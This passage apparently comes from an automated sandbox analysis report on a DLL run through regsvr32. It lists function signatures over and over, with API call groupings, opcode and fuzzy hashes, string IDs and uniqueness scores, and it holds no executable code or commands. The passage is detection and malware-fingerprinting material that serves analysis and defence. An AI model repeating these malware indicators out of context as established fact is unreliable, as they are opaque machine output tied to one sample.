                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$CloseHandle$CreateFileProcessWrite
                                                                                                                • String ID: 78a923d37d9cb2f4101b3c4515a2c02675d6d5267bc74fc9bcd78eaacb64aea8f0797acdd525b761543c226a75f717114989cc3f27c3189ffbc0debed858b8f9ee$h
                                                                                                                • API String ID: 2469797495-2933482531
                                                                                                                • Opcode ID: 55178184eb09f104d79d07a263a33a643988dc765b419fed74ace35f13dc1d84
                                                                                                                • Instruction ID: 371abaac4f873830af449f98aae34a0f14d08a6567ca77bcda089b4688665bd9
                                                                                                                • Opcode Fuzzy Hash: 55178184eb09f104d79d07a263a33a643988dc765b419fed74ace35f13dc1d84
                                                                                                                • Instruction Fuzzy Hash: 19D172A2A1478185EB10CFB4D4457AD23A1FB457A8F845739EA6E57BD9DFBCE084C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandle$CreateFile$InfoObjectPipeProcessReadSingleSizeStartupWait
                                                                                                                • String ID:
                                                                                                                • API String ID: 1192957364-0
                                                                                                                • Opcode ID: fc0fa6659517e819dafdf8e600e43bac8332d7090f7d8053019e5a9bd5cd5314
                                                                                                                • Instruction ID: e2524072ec0d5df9242b951bb1f3ad6fd559df2e95113464952bd3830599f659
                                                                                                                • Opcode Fuzzy Hash: fc0fa6659517e819dafdf8e600e43bac8332d7090f7d8053019e5a9bd5cd5314
                                                                                                                • Instruction Fuzzy Hash: 5D717172A08B4186E700CF65E8547AD77A0F784B98F544239DE8D97B69DFBCE145C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_fastfail__scrt_release_startup_lock
                                                                                                                • String ID:
                                                                                                                • API String ID: 2904100720-0
                                                                                                                • Opcode ID: ecab0114482c2ec688dfa3842c85ecafd53ff866dd27cb4879b756031482de8e
                                                                                                                • Instruction ID: d390045d5e5422036cbd31e9f919367fea3ba36290e882710473303d6fd677d2
                                                                                                                • Opcode Fuzzy Hash: ecab0114482c2ec688dfa3842c85ecafd53ff866dd27cb4879b756031482de8e
                                                                                                                • Instruction Fuzzy Hash: E0817EE1E0C28246FA51DBA59441BB96690BF85780FDC403DE94EEB396DEBCF849C710
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$CreateDirectoryFileNameSleepTemp
                                                                                                                • String ID:
                                                                                                                • API String ID: 3305644664-0
                                                                                                                • Opcode ID: 1d8870bc97b3dafc5db3ea0ba97cbef15424f58a1b777eb59c0d3835f179ad2f
                                                                                                                • Instruction ID: e32ffcacbca9169ca90f7e18a7bf7e1456c55692290a9c8b912445551adf2bf1
                                                                                                                • Opcode Fuzzy Hash: 1d8870bc97b3dafc5db3ea0ba97cbef15424f58a1b777eb59c0d3835f179ad2f
                                                                                                                • Instruction Fuzzy Hash: 555165A2F1468191EE00DBA9D48876C2361FB457F4F845635DE6E67BE9DEBCE084C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast_invalid_parameter_noinfo$CloseHandle$FileType_get_daylight
                                                                                                                • String ID:
                                                                                                                • API String ID: 4200888154-0
                                                                                                                • Opcode ID: 71f01104ff7e3a4af0a771ffe0c5fecb5d798a2d4bbd121972654079ddaa2c07
                                                                                                                • Instruction ID: 714502aced33693a301b89102243c7bade80aa2b1ea78ed2ab69dc9006572c7b
                                                                                                                • Opcode Fuzzy Hash: 71f01104ff7e3a4af0a771ffe0c5fecb5d798a2d4bbd121972654079ddaa2c07
                                                                                                                • Instruction Fuzzy Hash: C2C18F77B24A4186EB10CFA4D490BAC3761FB49B98F955229DA1FA77D4CF78E05AC300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.36%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
                                                                                                                • String ID:
                                                                                                                • API String ID: 2210144848-0
                                                                                                                • Opcode ID: d27a3087f713875c07f38d0daf1d19095cdd71fc549a9495fc9aa82f8085af1c
                                                                                                                • Instruction ID: 5431087f2c46e195b321973265ad1286e17ebfd6e3e163232a87d4d48d69310d
                                                                                                                • Opcode Fuzzy Hash: d27a3087f713875c07f38d0daf1d19095cdd71fc549a9495fc9aa82f8085af1c
                                                                                                                • Instruction Fuzzy Hash: E481B3A2E1960296FB10DBE59450BBC3661FB44794FC84139DA0FA7791DFBCB44AC310
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 5.54%

                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: FolderPathSleep
                                                                                                                • String ID: 61bb4cbabdd66e2dcc8fbf965c36bffc4f96bb75$e91409581de93eb534aecf6396dc12a19dec88a0
                                                                                                                • API String ID: 335171155-4265678583
                                                                                                                • Opcode ID: e9b3df1ba1e8ecfc405acaa2db9f3a957c062e15f7238413bcfe1d0abedcef11
                                                                                                                • Instruction ID: 5ddaec4b807e32dd9d9278991ca2165a8fc3c79ebed9cb997eb78d3b324680a1
                                                                                                                • Opcode Fuzzy Hash: e9b3df1ba1e8ecfc405acaa2db9f3a957c062e15f7238413bcfe1d0abedcef11
                                                                                                                • Instruction Fuzzy Hash: 83014F32A14B41A6E710DFA1EC407EA73A5FB44388F841529EA4D97AA5DFB8E119C740
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::cancel_current_task_invalid_parameter_noinfo_noreturn
                                                                                                                • String ID:
                                                                                                                • API String ID: 73155330-0
                                                                                                                • Opcode ID: b381ea4965073199c6f8d63d4c44edd4b43817c2b95fac7f7c15a69ee046a0c9
                                                                                                                • Instruction ID: 914cee4f5ba103f08198d204c2655a899dae14379298a1e0cdd78d1077efd8b0
                                                                                                                • Opcode Fuzzy Hash: b381ea4965073199c6f8d63d4c44edd4b43817c2b95fac7f7c15a69ee046a0c9
                                                                                                                • Instruction Fuzzy Hash: FB4117A171978181EE10DB519544B696258FF08BE4F880738DE7E977D5DEBCF056C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 100.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                • String ID:
                                                                                                                • API String ID: 3668304517-0
                                                                                                                • Opcode ID: 56d8f0dccdde754d40d0bae3878d9644bd5e5925c4c6d921d62358b75234aed1
                                                                                                                • Instruction ID: ec5acd95fc28d448a3d3e78b9f80cf5a24db694d794d2c9afdc3de2a4c025219
                                                                                                                • Opcode Fuzzy Hash: 56d8f0dccdde754d40d0bae3878d9644bd5e5925c4c6d921d62358b75234aed1
                                                                                                                • Instruction Fuzzy Hash: 602193E2B106C184EE10DBB8D4897AC2212BB457F4F848235DA3D5BBD9DEBCE085C204
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.11%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: EnvironmentStrings$Free
                                                                                                                • String ID:
                                                                                                                • API String ID: 3328510275-0
                                                                                                                • Opcode ID: 04cbaadb2a6dd25d9b6774af6319fe9db2bfec6af2eb1e02e04f5da83b9a374a
                                                                                                                • Instruction ID: fb0edeab6cb94073b49d228a124a8e4262298780945231733cb94312f8cd2aa8
                                                                                                                • Opcode Fuzzy Hash: 04cbaadb2a6dd25d9b6774af6319fe9db2bfec6af2eb1e02e04f5da83b9a374a
                                                                                                                • Instruction Fuzzy Hash: B6218461A1879182EA20DF52A440B2976A4BB94BD0B8C4139DE8FB3B99DF7DF456C300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.05%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastWrite
                                                                                                                • String ID:
                                                                                                                • API String ID: 442123175-0
                                                                                                                • Opcode ID: 89602d41ad2ed2eafb40d490e5d29d35eb46ddb6a982fe4b6a6d68275eb0f81d
                                                                                                                • Instruction ID: b2ec2d80157b7a06f201b9950d182eb2f19606b1b1ebcb8a1d44c8205b8be0db
                                                                                                                • Opcode Fuzzy Hash: 89602d41ad2ed2eafb40d490e5d29d35eb46ddb6a982fe4b6a6d68275eb0f81d
                                                                                                                • Instruction Fuzzy Hash: E331C472A08A819BDB50CF55E440BA977A0F758780F884039DA4ED3755DF7CE41AC700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.04%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 2976181284-0
                                                                                                                • Opcode ID: 3abf0dc9fd5f891ced624ec51d1ccfb61155d43bd67a41c6385aa0a755b7a3b9
                                                                                                                • Instruction ID: db9c685c0aba3831b8cc8e228b869ad647365a114d06a80482f88a0694458035
                                                                                                                • Opcode Fuzzy Hash: 3abf0dc9fd5f891ced624ec51d1ccfb61155d43bd67a41c6385aa0a755b7a3b9
                                                                                                                • Instruction Fuzzy Hash: D001C6E2A18A4242EF10DB65A4447786721BB41BB0FD81339EA7FA77D4CE7CE05AC300
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.36%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: CloseErrorHandleLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 918212764-0
                                                                                                                • Opcode ID: 8b0cf069ecff95a1d4bc6300deaaf3f2d4d7eff723277d176c1a770d3e0deddc
                                                                                                                • Instruction ID: 26b771b9a31ad7a1cb40a0d44d478a765f6ee11e6790d44bb54889e9b759eb8b
                                                                                                                • Opcode Fuzzy Hash: 8b0cf069ecff95a1d4bc6300deaaf3f2d4d7eff723277d176c1a770d3e0deddc
                                                                                                                • Instruction Fuzzy Hash: B31163A1F1868243EE90D7A49595B7826A27F847A5F8C023DD52FE62C3CEECB45DC201
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.92%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                • String ID:
                                                                                                                • API String ID: 3668304517-0
                                                                                                                • Opcode ID: 66298508653a3581e4e57949172bb3409b8a8406d6c769c73cefad1254015f87
                                                                                                                • Instruction ID: 80ff3524e3ea7e2b784f87037562159d88ee05f06ea85466f829d038fa209ff8
                                                                                                                • Opcode Fuzzy Hash: 66298508653a3581e4e57949172bb3409b8a8406d6c769c73cefad1254015f87
                                                                                                                • Instruction Fuzzy Hash: F761AF62B15A5584EB00CBB0D540ABD3775FB04B48F94542ADE4EA3B58DBB8E18AC340
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.11%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                • String ID:
                                                                                                                • API String ID: 3215553584-0
                                                                                                                • Opcode ID: f0cd2609e3af1ee320f86908ff88d3957b697c49a999549a78f4ade4815074b4
                                                                                                                • Instruction ID: 25e47fa07d65a86e6fe21b85556e51688e10f241f273ac45b640015c7fa6eecb
                                                                                                                • Opcode Fuzzy Hash: f0cd2609e3af1ee320f86908ff88d3957b697c49a999549a78f4ade4815074b4
                                                                                                                • Instruction Fuzzy Hash: EC41F6E1B1826685EA54D9B65500B39B281BF04FA0F9C5638DD6FA77C5CEBCF84BC200
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.14%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: bc4d8c2722bea0676e79132f13795ba2e807be06959329446b5923c7478e7ff7
                                                                                                                • Instruction ID: 73a289f18ccf4d0afb1138c4a79bb25393a811ab39f3a40e533bda4406211846
                                                                                                                • Opcode Fuzzy Hash: bc4d8c2722bea0676e79132f13795ba2e807be06959329446b5923c7478e7ff7
                                                                                                                • Instruction Fuzzy Hash: 3621A0A2A1924146E611DFA59841B7C3A55BB417A0FD94239EA1EA73D2CFBCF44BC700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.00%

                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: b0432bd87d15c28d9346f17ec9fb7566c22da78545eee12969034a50ea6e0707
                                                                                                                • Instruction ID: d9f9e8592626ba0b7d4675706a9e2bec63de92427be7d434714ec307a80d323d
                                                                                                                • Opcode Fuzzy Hash: b0432bd87d15c28d9346f17ec9fb7566c22da78545eee12969034a50ea6e0707
                                                                                                                • Instruction Fuzzy Hash: 032171A3E1824146FB11EBA19841B683654BB40BB0FC9423DE92EA73D2CEBCF457C700
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.00%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                • String ID:
                                                                                                                • API String ID: 3215553584-0
                                                                                                                • Opcode ID: 02cb021fd560143362c8cf4732d2d637891e2a298da59e892857b8cded576154
                                                                                                                • Instruction ID: af47ef0bf24e8d162c536a316d893b61464690457d20eb68a67b864da4ceca5e
                                                                                                                • Opcode Fuzzy Hash: 02cb021fd560143362c8cf4732d2d637891e2a298da59e892857b8cded576154
                                                                                                                • Instruction Fuzzy Hash: 3C21B3B2A0864187DB61CF68D440B7976A0FB84B58F984238DB5F976D9DF7DE405CB00
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: 0.14%

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000D.00000002.506290165.00007FF983D91000.00000040.00020000.sdmp, Offset: 00007FF983D90000, based on PE: true
                                                                                                                • Associated: 0000000D.00000002.506079487.00007FF983D90000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.513799389.00007FF983E04000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514089946.00007FF983E0D000.00000040.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514133606.00007FF983E0E000.00000080.00020000.sdmp Download File
                                                                                                                • Associated: 0000000D.00000002.514192235.00007FF983E10000.00000004.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_13_2_7ff983d90000_regsvr32.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                • String ID:
                                                                                                                • API String ID: 3215553584-0
                                                                                                                • Opcode ID: 092f86bd6f5588a0361e8f0b995989dfb593956ac1ba0dd867d5b9bfca474b8e
                                                                                                                • Instruction ID: 0acc0bd639a384c8d2b15adf026fbe529042d6b02c0e6584fbd6bbf5d9359e0c
